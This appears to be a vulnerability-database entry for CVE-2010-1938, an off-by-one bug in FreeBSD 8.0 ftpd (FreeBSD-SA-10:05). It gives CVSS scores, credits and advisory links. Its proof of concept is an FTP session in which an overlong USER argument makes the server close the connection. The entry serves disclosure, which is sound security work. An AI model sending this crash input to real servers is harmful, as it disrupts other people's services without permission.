FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)

2010.05.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-189


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
# CVE-2010-1938
# FreeBSD-SA-10:05
# Credit: Maksymilian Arciemowicz and Adam Zabrocki
#
# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
# http://blog.pi3.com.pl/?p=111
#

PoC:

Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.

--
Best Regards,
------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib) <cxib@securityreason.com>
sub 4096g/0889FA9A 2008-08-22

References:

http://cxsecurity.com/issue/WLB-2010050285
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc



Copyright 2017, cxsecurity.com
